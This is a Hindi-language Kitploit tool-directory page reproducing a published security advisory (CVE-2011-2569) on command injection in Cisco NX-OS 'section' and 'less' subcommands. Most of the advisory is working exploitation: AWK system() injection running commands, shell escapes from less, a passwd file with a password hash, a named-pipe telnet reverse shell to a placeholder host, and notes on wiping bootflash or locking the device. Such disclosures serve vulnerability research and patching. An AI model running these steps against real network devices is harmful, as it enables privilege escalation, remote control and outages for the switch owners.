Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
secpub — प्रकाशित सुरक्षा कमजोरियाँ, शोध, और संबंधित जानकारी। | Kitploit
उपकरण/GitHubGitHub/darkarnium/secpub
एम्बेडेड सिस्टम सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षाचयनित संसाधन
GitHubdarkarnium/secpub

secpub

प्रकाशित सुरक्षा कमजोरियाँ, शोध, और संबंधित जानकारी।

1382946 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

Cisco Nexus OS (NX-OS) - कमांड "इंजेक्शन" / सैनिटाइज़ेशन समस्याएं।

द्वारा खोजा गया:
  • Peter Adkins [email protected]
पहुंच:
  • स्थानीय; प्रमाणित पहुंच आवश्यक है।
ट्रैकिंग और पहचानकर्ता:
  • CVE - CVE-2011-2569
प्रभावित OS:
  • Cisco Nexus OS (NX-OS)
विक्रेता की भागीदारी:
  • सतर्क किया गया - कुछ प्लेटफार्मों के लिए पैच उपलब्ध / लागू किए गए।
प्रभावित सिस्टम / प्लेटफॉर्म:
  • Nexus 7000
  • Nexus 5000
  • Nexus 4000
  • Nexus 3000
  • Nexus 2000
  • Nexus 1000V
  • MDS
  • UCS
नोट्स:

स्थानीय पहुंच आवश्यक है। हालाँकि, विशेषाधिकार-रहित खाते अंतर्निहित Linux ऑपरेटिंग सिस्टम तक पहुंच प्राप्त कर सकते हैं, जिससे प्रभावी रूप से डिवाइस तक पूर्ण पहुंच प्राप्त हो जाती है। यह उन वातावरणों में संभावित रूप से समस्याएं पैदा कर सकता है जहां NOC और अन्य स्टाफ को पहले संपर्क बिंदु आदि के लिए निम्न-स्तरीय पहुंच की अनुमति दी जाती है।

NX-OS - "section" उप-कमांड - कमांड इंजेक्शन / सैनिटाइज़ेशन समस्याएं।

यह समस्या Nexus 7000 प्लेटफॉर्म पर पाई गई थी। ऐसा माना जाता है कि यह निम्नलिखित प्लेटफार्मों को भी प्रभावित करती है:

  • Nexus 7000 ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )
  • Nexus 5000 ( OS < UNK )
  • Nexus 4000 ( OS < UNK )
  • Nexus 3000 ( OS < UNK )
  • Nexus 2000 ( OS < UNK )
  • MDS ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )

section कमांड एक AWK स्क्रिप्ट प्रतीत होती है जिसमें अनुरोधित स्ट्रिंग पास की जाती है। हालाँकि, इनपुट सही ढंग से सैनिटाइज़ नहीं किया गया प्रतीत होता है। परिणामस्वरूप, AWK का उपयोग Linux सबसिस्टम पर मनमाने कमांड निष्पादित करने के लिए किया जा सकता है।

root@kitploit:~
nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk
Warning: There is already a file existing with this name. Do you want to
overwrite (yes/no)? [no] y

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011

nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
ascii
bin
boot
cfglabel.sysmgr
debug
licenses
linux
log
lost+found
11:18:41.885 UTC Wed Jul 13 2011

इसका उपयोग bootflash पर सभी फाइलों को हटाने और सिस्टम को 'reboot' कमांड जारी करने के लिए भी किया जा सकता है। हालाँकि, Linux सबसिस्टम से रीबूट करने से डिवाइस कंसोल पर संदेश उगलती है और लॉक हो जाती है; वास्तव में डिवाइस को रीलोड करने के बजाय।

NX-OS - "less" उप-कमांड - कमांड इंजेक्शन / सैनिटाइज़ेशन समस्याएं।

माना जाता है कि यह सॉफ्टवेयर के निम्नलिखित संस्करणों को प्रभावित करता है:

  • Nexus 7000 ( OS < 5.1(1) )
  • Nexus 5000 ( OS < 4.2(1)N2(1) )
  • Nexus 4000 ( OS < UNK)
  • Nexus 2000 ( OS < 4.2(1)N2(1) )
  • UCS ( OS < 1.4(1i) 1.3(1c) )
    • UCS प्लेटफॉर्म पर इंजेक्ट किए गए कमांड root के रूप में निष्पादित होते हैं।
  • Nexus 1000V ( OS < UNK )
  • MDS ( OS < 5.1(1) )

उदाहरण के तौर पर:

root@kitploit:~
switch# sh clock | less

एक बार less प्रस्तुत होने पर हम कोलन दबाकर और फिर "e" दबाकर तथा फ़ाइल का पथ निर्दिष्ट करके फाइलें खोलते हैं।

root@kitploit:~
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

हालाँकि, यह फिर से केवल रीड-ओनली पहुंच है। लेकिन, यदि हम "|" (पाइप) और फिर "$" कुंजी मैक्रो का उपयोग करते हैं, तो हम कमांड निष्पादित कर सकते हैं।

root@kitploit:~
!ls -lah > /bootflash/20110715

जैसा कि नीचे दिखाया गया है, फ़ाइल बूट-फ्लैश पर बनाई गई है।

root@kitploit:~
switch# dir
      97     Jul 15 12:01:44 2011  20110715

इस विधि का उपयोग करके, मैं निम्नलिखित का उपयोग करके NX-OS Linux सबसिस्टम में एक रिमोट शेल स्थापित करने में सक्षम रहा हूँ:

root@kitploit:~
 mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs

यहाँ तक कि reboot कमांड को भी मान्य इनपुट के रूप में स्वीकार किया जाता है। हालाँकि, डिवाइस को रीबूट करने के बजाय, यह कंसोल पर त्रुटियों को उगलते हुए सिस्टम को लॉक कर देता है।

root@kitploit:~
 switch# sh clock | less
 Fri Jul 15 12:06:30 UTC 2011
 !reboot

 Broadcast message from root (Fri Jul 15 12:06:39 2011):
टूल डाउनलोड करें